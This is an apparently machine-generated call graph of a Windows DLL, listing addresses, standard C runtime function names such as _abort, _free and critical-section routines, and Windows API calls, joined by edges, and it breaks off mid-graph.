10008b34 7194 1000637b _abort 20 API calls 7193->7194 7195 10008b46 7194->7195 7197 10005eb7 11 API calls 7195->7197 7199 10008b53 7195->7199 7196 1000571e _free 20 API calls 7198 10008ba5 7196->7198 7197->7195 7199->7196 7200 10009b3c 7201 10006355 __dosmaperr 20 API calls 7200->7201 7202 10009b44 7201->7202 7203 10006368 _free 20 API calls 7202->7203 7204 10009b4b 7203->7204 7205 100062ac ___std_exception_copy 26 API calls 7204->7205 7206 10009b56 7205->7206 7207 10002ada _ValidateLocalCookies 5 API calls 7206->7207 7208 10009d15 7207->7208 6170 1000543d 6171 10005440 6170->6171 6174 100055a8 6171->6174 6185 10007613 6174->6185 6177 100055b8 6179 100055c2 IsProcessorFeaturePresent 6177->6179 6180 100055e0 6177->6180 6181 100055cd 6179->6181 6215 10004bc1 6180->6215 6183 100060e2 _abort 8 API calls 6181->6183 6183->6180 6218 10007581 6185->6218 6188 1000766e 6189 1000767a _abort 6188->6189 6190 10005b7a _free 20 API calls 6189->6190 6194 100076a7 _abort 6189->6194 6196 100076a1 _abort 6189->6196 6190->6196 6191 100076f3 6192 10006368 _free 20 API calls 6191->6192 6193 100076f8 6192->6193 6197 100062ac ___std_exception_copy 26 API calls 6193->6197 6200 1000771f 6194->6200 6232 10005671 RtlEnterCriticalSection 6194->6232 6196->6191 6196->6194 6214 100076d6 6196->6214 6197->6214 6201 1000777e 6200->6201 6203 10007776 6200->6203 6211 100077a9 6200->6211 6233 100056b9 RtlLeaveCriticalSection 6200->6233 6201->6211 6234 10007665 6201->6234 6206 10004bc1 _abort 28 API calls 6203->6206 6206->6201 6210 10007665 _abort 38 API calls 6210->6211 6237 1000782e 6211->6237 6212 1000780c 6213 10005af6 _abort 38 API calls 6212->6213 6212->6214 6213->6214 6261 1000bdc9 6214->6261 6265 1000499b 6215->6265 6221 10007527 6218->6221 6220 100055ad 6220->6177 6220->6188 6222 10007533 ___scrt_is_nonwritable_in_current_image 6221->6222 6227 10005671 RtlEnterCriticalSection 6222->6227 6224 10007541 6228 10007575 6224->6228 6226 10007568 _abort 6226->6220 6227->6224 6231 100056b9 RtlLeaveCriticalSection 6228->6231 6230 1000757f 6230->6226 6231->6230 6232->6200 6233->6203 6235 10005af6 _abort 38 API calls 6234->6235 6236 1000766a 6235->6236 6236->6210 6238 10007834 6237->6238 6239 100077fd 6237->6239 6264 100056b9 RtlLeaveCriticalSection 6238->6264 6239->6212 6239->6214 6241 10005af6 GetLastError 6239->6241 6242 10005b12 6241->6242 6243 10005b0c 6241->6243 6245 1000637b _abort 20 API calls 6242->6245 6247 10005b61 SetLastError 6242->6247 6244 10005e08 _abort 11 API calls 6243->6244 6244->6242 6246 10005b24 6245->6246 6248 10005b2c 6246->6248 6249 10005e5e _abort 11 API calls 6246->6249 6247->6212 6250 1000571e _free 20 API calls 6248->6250 6251 10005b41 6249->6251 6252 10005b32 6250->6252 6251->6248 6253 10005b48 6251->6253 6255 10005b6d SetLastError 6252->6255 6254 1000593c _abort 20 API calls 6253->6254 6256 10005b53 6254->6256 6257 100055a8 _abort 35 API calls 6255->6257 6258 1000571e _free 20 API calls 6256->6258 6259 10005b79 6257->6259 6260 10005b5a 6258->6260 6260->6247 6260->6255 6262 10002ada _ValidateLocalCookies 5 API calls 6261->6262 6263 1000bdd4 6262->6263 6263->6263 6264->6239 6266 100049a7 _abort 6265->6266 6267 100049bf 6266->6267 6287 10004af5 GetModuleHandleW 6266->6287 6296 10005671 RtlEnterCriticalSection 6267->6296 6271 10004a65 6304 10004aa5 6271->6304 6275 10004a3c 6277 10004a54 6275->6277 6300 10004669 6275->6300 6276 100049c7 6276->6271 6276->6275 6297 1000527a 6276->6297 6283 10004669 _abort 5 API calls 6277->6283 6278 10004a82 6307 10004ab4 6278->6307 6279 10004aae 6281 1000bdc9 _abort 5 API calls 6279->6281 6286 10004ab3 6281->6286 6283->6271 6288 100049b3 6287->6288 6288->6267 6289 10004b39 GetModuleHandleExW 6288->6289 6290 10004b63 GetProcAddress 6289->6290 6293 10004b78 6289->6293 6290->6293 6291 10004b95 6294 10002ada _ValidateLocalCookies 5 API calls 6291->6294 6292 10004b8c FreeLibrary 6292->6291 6293->6291 6293->6292 6295 10004b9f 6294->6295 6295->6267 6296->6276 6315 10005132 6297->6315 6301 10004698 6300->6301 6302 10002ada _ValidateLocalCookies 5 API calls 6301->6302 6303 100046c1 6302->6303 6303->6277 6337 100056b9 RtlLeaveCriticalSection 6304->6337 6306 10004a7e 6306->6278 6306->6279 6338 10006025 6307->6338 6310 10004ae2 6313 10004b39 _abort 8 API calls 6310->6313 6311 10004ac2 GetPEB 6311->6310 6312 10004ad2 GetCurrentProcess TerminateProcess 6311->6312 6312->6310 6314 10004aea ExitProcess 6313->6314 6318 100050e1 6315->6318 6317 10005156 6317->6275 6319 100050ed ___scrt_is_nonwritable_in_current_image 6318->6319 6326 10005671 RtlEnterCriticalSection 6319->6326 6321 100050fb 6327 1000515a 6321->6327 6325 10005119 _abort 6325->6317 6326->6321 6328 1000517a 6327->6328 6331 10005182 6327->6331 6329 10002ada _ValidateLocalCookies 5 API calls 6328->6329 6330 10005108 6329->6330 6333 10005126 6330->6333 6331->6328 6332 1000571e _free 20 API calls 6331->6332 6332->6328 6336 100056b9 RtlLeaveCriticalSection 6333->6336 6335 10005130 6335->6325 6336->6335 6337->6306 6339 10006040 6338->6339 6340 1000604a 6338->6340 6342 10002ada _ValidateLocalCookies 5 API calls 6339->6342 6341 10005c45 _abort 5 API calls 6340->6341 6341->6339 6343 10004abe 6342->6343 6343->6310 6343->6311 7209 10001f3f 7210 10001f4b ___scrt_is_nonwritable_in_current_image 7209->7210 7227 1000247c 7210->7227 7212 10001f52 7213 10002041 7212->7213 7214 10001f7c 7212->7214 7226 10001f57 ___scrt_is_nonwritable_in_current_image 7212->7226 7216 10002639 ___scrt_fastfail 4 API calls 7213->7216 7238 100023de 7214->7238 7217 10002048 7216->7217 7218 10001f8b __RTC_Initialize 7218->7226 7241 100022fc RtlInitializeSListHead 7218->7241 7220 10001f99 ___scrt_initialize_default_local_stdio_options 7242 100046c5 7220->7242 7224 10001fb8 7225 10004669 _abort 5 API calls 7224->7225 7224->7226 7225->7226 7228 10002485 7227->7228 7250 10002933 IsProcessorFeaturePresent 7228->7250 7232 10002496 7233 1000249a 7232->7233 7261 100053c8 7232->7261 7233->7212 7236 100024b1 7236->7212 7237 10003529 ___vcrt_uninitialize 8 API calls 7237->7233 7292 100024b5 7238->7292 7240 100023e5 7240->7218 7241->7220 7244 100046dc 7242->7244 7243 10002ada _ValidateLocalCookies 5 API calls 7245 10001fad 7243->7245 7244->7243 7245->7226 7246 100023b3 7245->7246 7247 100023b8 ___scrt_release_startup_lock 7246->7247 7248 10002933 ___isa_available_init IsProcessorFeaturePresent 7247->7248 7249 100023c1 7247->7249 7248->7249 7249->7224 7251 10002491 7250->7251 7252 100034ea 7251->7252 7253 100034ef ___vcrt_initialize_winapi_thunks 7252->7253 7264 10003936 7253->7264 7257 10003505 7258 10003510 7257->7258 7259 10003972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 7257->7259 7258->7232 7260 100034fd 7259->7260 7260->7232 7288 10007457 7261->7288 7265 1000393f 7264->7265 7267 10003968 7265->7267 7268 100034f9 7265->7268 7278 10003be0 7265->7278 7269 10003972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 7267->7269 7268->7260 7270 100038e8 7268->7270 7269->7268 7283 10003af1 7270->7283 7273 10003ba2 ___vcrt_FlsSetValue 6 API calls 7274 1000390b 7273->7274 7275 10003918 7274->7275 7276 1000391b ___vcrt_uninitialize_ptd 6 API calls 7274->7276 7275->7257 7277 100038fd 7276->7277 7277->7257 7279 10003a82 try_get_function 5 API calls 7278->7279 7280 10003bfa 7279->7280 7281 10003c18 InitializeCriticalSectionAndSpinCount 7280->7281 7282 10003c03 7280->7282 7281->7282 7282->7265 7284 10003a82 try_get_function 5 API calls 7283->7284 7285 10003b0b 7284->7285 7286 10003b24 TlsAlloc 7285->7286 7287 100038f2 7285->7287 7287->7273 7287->7277 7291 10007470 7288->7291 7289 10002ada _ValidateLocalCookies 5 API calls 7290 100024a3 7289->7290 7290->7236 7290->7237 7291->7289 7293 100024c4 7292->7293 7294 100024c8 7292->7294 7293->7240 7295 10002639 ___scrt_fastfail 4 API calls 7294->7295 7297 100024d5 ___scrt_release_startup_lock 7294->7297 7296 10002559 7295->7296 7297->7240 6344 10008640 6347 10008657 6344->6347 6348 10008665 6347->6348 6349 10008679 6347->6349 6352 10006368 _free 20 API calls 6348->6352 6350 10008681 6349->6350 6351 10008693 6349->6351 6353 10006368 _free 20 API calls 6350->6353 6358 10008652 6351->6358 6360 100054a7 6351->6360 6354 1000866a 6352->6354 6356 10008686 6353->6356 6355 100062ac ___std_exception_copy 26 API calls 6354->6355 6355->6358 6359 100062ac ___std_exception_copy 26 API calls 6356->6359 6359->6358 6361 100054c4 6360->6361 6362 100054ba 6360->6362 6361->6362 6363 10005af6 _abort 38 API calls 6361->6363 6362->6358 6364 100054e5 6363->6364 6368 10007a00 6364->6368 6369 10007a13 6368->6369 6370 100054fe 6368->6370 6369->6370 6376 10007f0f 6369->6376 6372 10007a2d 6370->6372 6373 10007a40 6372->6373 6374 10007a55 6372->6374 6373->6374 6511 10006d7e 6373->6511 6374->6362 6377 10007f1b ___scrt_is_nonwritable_in_current_image 6376->6377 6378 10005af6 _abort 38 API calls 6377->6378 6379 10007f24 6378->6379 6380 10007f72 _abort 6379->6380 6388 10005671 RtlEnterCriticalSection 6379->6388 6380->6370 6382 10007f42 6389 10007f86 6382->6389 6387 100055a8 _abort 38 API calls 6387->6380 6388->6382 6390 10007f94 _abort 6389->6390 6392 10007f56 6389->6392 6390->6392 6396 10007cc2 6390->6396 6393 10007f75 6392->6393 6510 100056b9 RtlLeaveCriticalSection 6393->6510 6395 10007f69 6395->6380 6395->6387 6397 10007d42 6396->6397 6399 10007cd8 6396->6399 6400 1000571e _free 20 API calls 6397->6400 6422 10007d90 6397->6422 6399->6397 6401 10007d0b 6399->6401 6407 1000571e _free 20 API calls 6399->6407 6402 10007d64 6400->6402 6403 10007d2d 6401->6403 6408 1000571e _free 20 API calls 6401->6408 6404 1000571e _free 20 API calls 6402->6404 6406 1000571e _free 20 API calls 6403->6406 6405 10007d77 6404->6405 6409 1000571e _free 20 API calls 6405->6409 6410 10007d37 6406->6410 6412 10007d00 6407->6412 6414 10007d22 6408->6414 6415 10007d85 6409->6415 6416 1000571e _free 20 API calls 6410->6416 6411 10007dfe 6417 1000571e _free 20 API calls 6411->6417 6424 100090ba 6412->6424 6413 10007d9e 6413->6411 6423 1000571e 20 API calls _free 6413->6423 6452 100091b8 6414->6452 6420 1000571e _free 20 API calls 6415->6420 6416->6397 6421 10007e04 6417->6421 6420->6422 6421->6392 6464 10007e35 6422->6464 6423->6413 6425 100090cb 6424->6425 6451 100091b4 6424->6451 6426 100090dc 6425->6426 6427 1000571e _free 20 API calls 6425->6427 6428 100090ee 6426->6428 6430 1000571e _free 20 API calls 6426->6430 6427->6426 6429 10009100 6428->6429 6431 1000571e _free 20 API calls 6428->6431 6432 10009112 6429->6432 6433 1000571e _free 20 API calls 6429->6433 6430->6428 6431->6429 6434 10009124 6432->6434 6435 1000571e _free 20 API calls 6432->6435 6433->6432 6436 10009136 6434->6436 6437 1000571e _free 20 API calls 6434->6437 6435->6434 6438 1000571e _free 20 API calls 6436->6438 6440 10009148 6436->6440 6437->6436 6438->6440 6439 1000915a 6442 1000916c 6439->6442 6443 1000571e _free 20 API calls 6439->6443 6440->6439 6441 1000571e _free 20 API calls 6440->6441 6441->6439 6444 1000917e 6442->6444 6446 1000571e _free 20 API calls 6442->6446 6443->6442 6445 10009190 6444->6445 6447 1000571e _free 20 API calls 6444->6447 6448 100091a2 6445->6448 6449 1000571e _free 20 API calls 6445->6449 6446->6444 6447->6445 6450 1000571e _free 20 API calls 6448->6450 6448->6451 6449->6448 6450->6451 6451->6401 6453 100091c5 6452->6453 6463 1000921d 6452->6463 6454 100091d5 6453->6454 6455 1000571e _free 20 API calls 6453->6455 6456 1000571e _free 20 API calls 6454->6456 6459 100091e7 6454->6459 6455->6454 6456->6459 6457 100091f9 6458 1000920b 6457->6458 6461 1000571e _free 20 API calls 6457->6461 6462 1000571e _free 20 API calls 6458->6462 6458->6463 6459->6457 6460 1000571e _free 20 API calls 6459->6460 6460->6457 6461->6458 6462->6463 6463->6403 6465 10007e60 6464->6465 6466 10007e42 6464->6466 6465->6413 6466->6465 6470 1000925d 6466->6470 6469 1000571e _free 20 API calls 6469->6465 6471 10007e5a 6470->6471 6472 1000926e 6470->6472 6471->6469 6506 10009221 6472->6506 6475 10009221 _abort 20 API calls 6476 10009281 6475->6476 6477 10009221 _abort 20 API calls 6476->6477 6478 1000928c 6477->6478 6479 10009221 _abort 20 API calls 6478->6479 6480 10009297 6479->6480 6481 10009221 _abort 20 API calls 6480->6481 6482 100092a5 6481->6482 6483 1000571e _free 20 API calls 6482->6483 6484 100092b0 6483->6484 6485 1000571e _free 20 API calls 6484->6485 6486 100092bb 6485->6486 6487 1000571e _free 20 API calls 6486->6487 6488 100092c6 6487->6488 6489 10009221 _abort 20 API calls 6488->6489 6490 100092d4 6489->6490 6491 10009221 _abort 20 API calls 6490->6491 6492 100092e2 6491->6492 6493 10009221 _abort 20 API calls 6492->6493 6494 100092f3 6493->6494 6495 10009221 _abort 20 API calls 6494->6495 6496 10009301 6495->6496 6497 10009221 _abort 20 API calls 6496->6497 6498 1000930f 6497->6498 6499 1000571e _free 20 API calls 6498->6499 6500 1000931a 6499->6500 6501 1000571e _free 20 API calls 6500->6501 6502 10009325 6501->6502 6503 1000571e _free 20 API calls 6502->6503 6504 10009330 6503->6504 6505 1000571e _free 20 API calls 6504->6505 6505->6471 6507 10009258 6506->6507 6508 10009248 6506->6508 6507->6475 6508->6507 6509 1000571e _free 20 API calls 6508->6509 6509->6508 6510->6395 6512 10006d8a ___scrt_is_nonwritable_in_current_image 6511->6512 6513 10005af6 _abort 38 API calls 6512->6513 6518 10006d94 6513->6518 6515 10006e18 _abort 6515->6374 6517 100055a8 _abort 38 API calls 6517->6518 6518->6515 6518->6517 6519 1000571e _free 20 API calls 6518->6519 6520 10005671 RtlEnterCriticalSection 6518->6520 6521 10006e0f 6518->6521 6519->6518 6520->6518 6524 100056b9 RtlLeaveCriticalSection 6521->6524 6523 10006e16 6523->6518 6524->6523 7298 1000af43 7299 1000af59 7298->7299 7300 1000af4d 7298->7300 7300->7299 7301 1000af52 CloseHandle 7300->7301 7301->7299 7302 1000a945 7304 1000a96d 7302->7304 7303 1000a9a5 7304->7303 7305 1000a997 7304->7305 7306 1000a99e 7304->7306 7311 1000aa17 7305->7311 7315 1000aa00 7306->7315 7312 1000aa20 7311->7312 7319 1000b19b 7312->7319 7316 1000aa20 7315->7316 7317 1000b19b __startOneArgErrorHandling 21 API calls 7316->7317 7318 1000a9a3 7317->7318 7320 1000b1da __startOneArgErrorHandling 7319->7320 7325 1000b25c __startOneArgErrorHandling 7320->7325 7329 1000b59e 7320->7329 7322 1000b286 7323 1000b8b2 __startOneArgErrorHandling 20 API calls 7322->7323 7324 1000b292 7322->7324 7323->7324 7327 10002ada _ValidateLocalCookies 5 API calls 7324->7327 7325->7322 7326 100078a3 __startOneArgErrorHandling 5 API calls 7325->7326 7326->7322 7328 1000a99c 7327->7328 7330 1000b5c1 __raise_exc RaiseException 7329->7330 7331 1000b5bc 7330->7331 7331->7325 7593 1000a1c6 IsProcessorFeaturePresent 7594 10007bc7 7595 10007bd3 ___scrt_is_nonwritable_in_current_image 7594->7595 7596 10007c0a _abort 7595->7596 7602 10005671 RtlEnterCriticalSection 7595->7602 7598 10007be7 7599 10007f86 20 API calls 7598->7599 7600 10007bf7 7599->7600 7603 10007c10 7600->7603 7602->7598 7606 100056b9 RtlLeaveCriticalSection 7603->7606 7605 10007c17 7605->7596 7606->7605 7332 10005348 7333 10003529 ___vcrt_uninitialize 8 API calls 7332->7333 7334 1000534f 7333->7334 7335 10007b48 7345 10008ebf 7335->7345 7339 10007b55 7358 1000907c 7339->7358 7342 10007b7f 7343 1000571e _free 20 API calls 7342->7343 7344 10007b8a 7343->7344 7362 10008ec8 7345->7362 7347 10007b50 7348 10008fdc 7347->7348 7349 10008fe8 ___scrt_is_nonwritable_in_current_image 7348->7349 7382 10005671 RtlEnterCriticalSection 7349->7382 7351 1000905e 7396 10009073 7351->7396 7352 10008ff3 7352->7351 7354 10009032 RtlDeleteCriticalSection 7352->7354 7383 1000a09c 7352->7383 7357 1000571e _free 20 API calls 7354->7357 7355 1000906a _abort 7355->7339 7357->7352 7359 10009092 7358->7359 7360 10007b64 RtlDeleteCriticalSection 7358->7360 7359->7360 7361 1000571e _free 20 API calls 7359->7361 7360->7339 7360->7342 7361->7360 7363 10008ed4 ___scrt_is_nonwritable_in_current_image 7362->7363 7372 10005671 RtlEnterCriticalSection 7363->7372 7365 10008f77 7377 10008f97 7365->7377 7369 10008f83 _abort 7369->7347 7370 10008e78 30 API calls 7371 10008ee3 7370->7371 7371->7365 7371->7370 7373 10007b94 RtlEnterCriticalSection 7371->7373 7374 10008f6d 7371->7374 7372->7371 7373->7371 7380 10007ba8 RtlLeaveCriticalSection 7374->7380 7376 10008f75 7376->7371 7381 100056b9 RtlLeaveCriticalSection 7377->7381 7379 10008f9e 7379->7369 7380->7376 7381->7379 7382->7352 7384 1000a0a8 ___scrt_is_nonwritable_in_current_image 7383->7384 7385 1000a0b9 7384->7385 7386 1000a0ce 7384->7386 7387 10006368 _free 20 API calls 7385->7387 7395 1000a0c9 _abort 7386->7395 7399 10007b94 RtlEnterCriticalSection 7386->7399 7389 1000a0be 7387->7389 7391 100062ac ___std_exception_copy 26 API calls 7389->7391 7390 1000a0ea 7400 1000a026 7390->7400 7391->7395 7393 1000a0f5 7416 1000a112 7393->7416 7395->7352 7491 100056b9 RtlLeaveCriticalSection 7396->7491 7398 1000907a 7398->7355 7399->7390 7401 1000a033 7400->7401 7402 1000a048 7400->7402 7403 10006368 _free 20 API calls 7401->7403 7408 1000a043 7402->7408 7419 10008e12 7402->7419 7404 1000a038 7403->7404 7406 100062ac ___std_exception_copy 26 API calls 7404->7406 7406->7408 7408->7393 7409 1000907c 20 API calls 7410 1000a064 7409->7410 7425 10007a5a 7410->7425 7412 1000a06a 7432 1000adce 7412->7432 7415 1000571e _free 20 API calls 7415->7408 7490 10007ba8 RtlLeaveCriticalSection 7416->7490 7418 1000a11a 7418->7395 7420 10008e2a 7419->7420 7422 10008e26 7419->7422 7421 10007a5a 26 API calls 7420->7421 7420->7422 7423 10008e4a 7421->7423 7422->7409 7447 10009a22 7423->7447 7426 10007a66 7425->7426 7427 10007a7b 7425->7427 7428 10006368 _free 20 API calls 7426->7428 7427->7412 7429 10007a6b 7428->7429 7430 100062ac ___std_exception_copy 26 API calls 7429->7430 7431 10007a76 7430->7431 7431->7412 7433 1000adf2 7432->7433 7434 1000addd 7432->7434 7436 1000ae2d 7433->7436 7440 1000ae19 7433->7440 7435 10006355 __dosmaperr 20 API calls 7434->7435 7437 1000ade2 7435->7437 7438 10006355 __dosmaperr 20 API calls 7436->7438 7439 10006368 _free 20 API calls 7437->7439 7441 1000ae32 7438->7441 7444 1000a070 7439->7444 7474 1000ada6 7440->7474 7443 10006368 _free 20 API calls 7441->7443 7445 1000ae3a 7443->7445 7444->7408 7444->7415 7446 100062ac ___std_exception_copy 26 API calls 7445->7446 7446->7444 7448 10009a2e ___scrt_is_nonwritable_in_current_image 7447->7448 7449 10009a36 7448->7449 7450 10009a4e 7448->7450 7452 10006355 __dosmaperr 20 API calls 7449->7452 7451 10009aec 7450->7451 7455 10009a83 7450->7455 7453 10006355 __dosmaperr 20 API calls 7451->7453 7454 10009a3b 7452->7454 7456 10009af1 7453->7456 7457 10006368 _free 20 API calls 7454->7457 7469 10008c7b RtlEnterCriticalSection 7455->7469 7459 10006368 _free 20 API calls 7456->7459 7464 10009a43 _abort 7457->7464 7461 10009af9 7459->7461 7460 10009a89 7463 10006368 _free 20 API calls 7460->7463 7467 10009ab5 7460->7467 7462 100062ac ___std_exception_copy 26 API calls 7461->7462 7462->7464 7465 10009aaa 7463->7465 7464->7422 7466 10006355 __dosmaperr 20 API calls 7465->7466 7466->7467 7470 10009ae4 7467->7470 7469->7460 7473 10008c9e RtlLeaveCriticalSection 7470->7473 7472 10009aea 7472->7464 7473->7472 7477 1000ad24 7474->7477 7476 1000adca 7476->7444 7478 1000ad30 ___scrt_is_nonwritable_in_current_image 7477->7478 7485 10008c7b RtlEnterCriticalSection 7478->7485 7480 1000ad3e 7481 10006368 _free 20 API calls 7480->7481 7482 1000ad65 7480->7482 7481->7482 7486 1000ad9a 7482->7486 7484 1000ad8d _abort 7484->7476 7485->7480 7489 10008c9e RtlLeaveCriticalSection 7486->7489 7488 1000ada4 7488->7484 7489->7488 7490->7418 7491->7398 6525 10002049 6526 10002055 ___scrt_is_nonwritable_in_current_image 6525->6526 6527 1000205e 6526->6527 6528 100020d3 6526->6528 6529 1000207d 6526->6529 6560 10002639 IsProcessorFeaturePresent 6528->6560 6539 1000244c 6529->6539 6532 10002082 6548 10002308 6532->6548 6533 100020da 6535 10002087 __RTC_Initialize 6551 100020c4 6535->6551 6537 1000209f 6554 1000260b 6537->6554 6540 10002451 ___scrt_release_startup_lock 6539->6540 6541 10002455 6540->6541 6544 10002461 6540->6544 6542 1000527a _abort 20 API calls 6541->6542 6543 1000245f 6542->6543 6543->6532 6545 1000246e 6544->6545 6546 1000499b _abort 28 API calls 6544->6546 6545->6532 6547 10004bbd 6546->6547 6547->6532 6564 100034c7 RtlInterlockedFlushSList 6548->6564 6550 10002312 6550->6535 6566 1000246f 6551->6566 6553 100020c9 ___scrt_release_startup_lock 6553->6537 6555 10002617 6554->6555 6556 1000262d 6555->6556 6607 100053ed 6555->6607 6556->6527 6561 1000264e ___scrt_fastfail 6560->6561 6562 100026f9 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6561->6562 6563 10002744 ___scrt_fastfail 6562->6563 6563->6533 6565 100034d7 6564->6565 6565->6550 6571 100053ff 6566->6571 6578 10005c2b 6571->6578 6574 1000391b 6575 1000354d 6574->6575 6576 10003925 6574->6576 6575->6553 6589 10003b2c 6576->6589 6579 10002476 6578->6579 6580 10005c35 6578->6580 6579->6574 6582 10005db2 6580->6582 6583 10005c45 _abort 5 API calls 6582->6583 6584 10005dd9 6583->6584 6585 10005df1 TlsFree 6584->6585 6586 10005de5 6584->6586 6585->6586 6587 10002ada _ValidateLocalCookies 5 API calls 6586->6587 6588 10005e02 6587->6588 6588->6579 6594 10003a82 6589->6594 6591 10003b46 6592 10003b5e TlsFree 6591->6592 6593 10003b52 6591->6593 6592->6593 6593->6575 6595 10003aaa 6594->6595 6599 10003aa6 __crt_fast_encode_pointer 6594->6599 6595->6599 6600 100039be 6595->6600 6598 10003ac4 GetProcAddress 6598->6599 6599->6591 6605 100039cd try_get_first_available_module 6600->6605 6601 100039ea LoadLibraryExW 6602 10003a05 GetLastError 6601->6602 6601->6605 6602->6605 6603 10003a60 FreeLibrary 6603->6605 6604 10003a77 6604->6598 6604->6599 6605->6601 6605->6603 6605->6604 6606 10003a38 LoadLibraryExW 6605->6606 6606->6605 6618 100074da 6607->6618 6610 10003529 6611 10003532 6610->6611 6612 10003543 6610->6612 6613 1000391b ___vcrt_uninitialize_ptd 6 API calls 6611->6613 6612->6556 6614 10003537 6613->6614 6622 10003972 6614->6622 6621 100074f3 6618->6621 6619 10002ada _ValidateLocalCookies 5 API calls 6620 10002625 6619->6620 6620->6610 6621->6619 6623 1000353c 6622->6623 6624 1000397d 6622->6624 6626 10003c50 6623->6626 6625 10003987 RtlDeleteCriticalSection 6624->6625 6625->6623 6625->6625 6627 10003c59 6626->6627 6628 10003c7f 6626->6628 6627->6628 6629 10003c69 FreeLibrary 6627->6629 6628->6612 6629->6627 7607 10009bcd 7608 10009bd0 7607->7608 7609 10009bd7 7608->7609 7610 10009bf9 7608->7610 7612 10009ccd 7609->7612 7628 10009645 7609->7628 7615 10009bef 7610->7615 7633 10009492 GetConsoleCP 7610->7633 7614 10006368 _free 20 API calls 7612->7614 7625 10009cc0 7612->7625 7616 10009cf2 7614->7616 7615->7612 7617 10009ca9 7615->7617 7615->7625 7618 10006355 __dosmaperr 20 API calls 7616->7618 7620 10009cb0 7617->7620 7621 10009cc4 7617->7621 7618->7625 7619 10002ada _ValidateLocalCookies 5 API calls 7622 10009d15 7619->7622 7624 10006368 _free 20 API calls 7620->7624 7623 10006332 __dosmaperr 20 API calls 7621->7623 7623->7625 7626 10009cb5 7624->7626 7625->7619 7627 10006355 __dosmaperr 20 API calls 7626->7627 7627->7625 7631 1000969f 7628->7631 7632 1000966a 7628->7632 7629 100096a1 GetLastError 7629->7631 7630 1000a181 WriteConsoleW CreateFileW 7630->7632 7631->7615 7632->7629 7632->7630 7632->7631 7635 100094f5 __fassign 7633->7635 7642 10009607 7633->7642 7634 10002ada _ValidateLocalCookies 5 API calls 7636 10009641 7634->7636 7638 1000957b WideCharToMultiByte 7635->7638 7641 100095d2 WriteFile 7635->7641 7635->7642 7643 10007c19 7635->7643 7636->7615 7639 100095a1 WriteFile 7638->7639 7638->7642 7639->7635 7640 1000962a GetLastError 7639->7640 7640->7642 7641->7635 7641->7640 7642->7634 7644 10005af6 _abort 38 API calls 7643->7644 7645 10007c24 7644->7645 7646 10007a00 38 API calls 7645->7646 7647 10007c34 7646->7647 7647->7635 6630 1000724e GetProcessHeap 6631 1000284f 6632 10002882 std::exception::exception 27 API calls 6631->6632 6633 1000285d 6632->6633 6970 100036d0 6971 100036e2 6970->6971 6973 100036f0 @_EH4_CallFilterFunc@8 6970->6973 6972 10002ada _ValidateLocalCookies 5 API calls 6971->6972 6972->6973 7492 10005351 7493 10005360 7492->7493 7497 10005374 7492->7497 7495 1000571e _free 20 API calls 7493->7495 7493->7497 7494 1000571e _free 20 API calls 7496 10005386 7494->7496 7495->7497 7498 1000571e _free 20 API calls 7496->7498 7497->7494 7499 10005399 7498->7499 7500 1000571e _free 20 API calls 7499->7500 7501 100053aa 7500->7501 7502 1000571e _free 20 API calls 7501->7502 7503 100053bb 7502->7503 7504 10008d52 7505 10008d74 7504->7505 7506 10008d5f 7504->7506 7508 10006355 __dosmaperr 20 API calls 7505->7508 7512 10008d99 7505->7512 7507 10006355 __dosmaperr 20 API calls 7506->7507 7509 10008d64 7507->7509 7510 10008da4 7508->7510 7511 10006368 _free 20 API calls 7509->7511 7513 10006368 _free 20 API calls 7510->7513 7515 10008d6c 7511->7515 7514 10008dac 7513->7514 7516 100062ac ___std_exception_copy 26 API calls 7514->7516 7516->7515 6974 100066d5 6975 100066e1 6974->6975 6976 100066f2 6975->6976 6977 100066eb FindClose 6975->6977 6978 10002ada _ValidateLocalCookies 5 API calls 6976->6978 6977->6976 6979 10006701 6978->6979 7648 100073d5 7649 100073e1 ___scrt_is_nonwritable_in_current_image 7648->7649 7658 10005671 RtlEnterCriticalSection 7649->7658 7651 100073e8 7657 10007406 7651->7657 7659 10007269 GetStartupInfoW 7651->7659 7655 10007417 _abort 7668 10007422 7657->7668 7658->7651 7660 10007318 7659->7660 7661 10007286 7659->7661 7663 1000731f 7660->7663 7661->7660 7662 100072dd GetFileType 7661->7662 7662->7661 7664 10007326 7663->7664 7665 10007369 GetStdHandle 7664->7665 7666 100073d1 7664->7666 7667 1000737c GetFileType 7664->7667 7665->7664 7666->7657 7667->7664 7671 100056b9 RtlLeaveCriticalSection 7668->7671 7670 10007429 7670->7655 7671->7670 6980 10004ed7 6981 10006d60 51 API calls 6980->6981 6982 10004ee9 6981->6982 6991 10007153 GetEnvironmentStringsW 6982->6991 6986 1000571e _free 20 API calls 6987 10004f29 6986->6987 6988 10004eff 6989 1000571e _free 20 API calls 6988->6989 6990 10004ef4 6989->6990 6990->6986 6992 1000716a 6991->6992 7002 100071bd 6991->7002 6995 10007170 WideCharToMultiByte 6992->6995 6993 100071c6 FreeEnvironmentStringsW 6994 10004eee 6993->6994 6994->6990 7003 10004f2f 6994->7003 6996 1000718c 6995->6996 6995->7002 6997 100056d0 21 API calls 6996->6997 6998 10007192 6997->6998 6999 10007199 WideCharToMultiByte 6998->6999 7000 100071af 6998->7000 6999->7000 7001 1000571e _free 20 API calls 7000->7001 7001->7002 7002->6993 7002->6994 7004 10004f44 7003->7004 7005 1000637b _abort 20 API calls 7004->7005 7015 10004f6b 7005->7015 7006 10004fcf 7007 1000571e _free 20 API calls 7006->7007 7008 10004fe9 7007->7008 7008->6988 7009 1000637b _abort 20 API calls 7009->7015 7010 10004fd1 7012 10005000 20 API calls 7010->7012 7011 1000544d ___std_exception_copy 26 API calls 7011->7015 7013 10004fd7 7012->7013 7014 1000571e _free 20 API calls 7013->7014 7014->7006 7015->7006 7015->7009 7015->7010 7015->7011 7016 10004ff3 7015->7016 7018 1000571e _free 20 API calls 7015->7018 7017 100062bc ___std_exception_copy 11 API calls 7016->7017 7019 10004fff 7017->7019 7018->7015 6634 1000ae59 6635 1000ae5f 6634->6635 6640 10008cc1 6635->6640 6638 10006332 __dosmaperr 20 API calls 6639 1000aedd 6638->6639 6641 10008cd0 6640->6641 6642 10008d37 6640->6642 6641->6642 6647 10008cfa 6641->6647 6643 10006368 _free 20 API calls 6642->6643 6644 10008d3c 6643->6644 6645 10006355 __dosmaperr 20 API calls 6644->6645 6646 10008d27 6645->6646 6646->6638 6646->6639 6647->6646 6648 10008d21 SetStdHandle 6647->6648 6648->6646 5796 10001c5b 5797 10001c6b ___scrt_fastfail 5796->5797 5800 100012ee 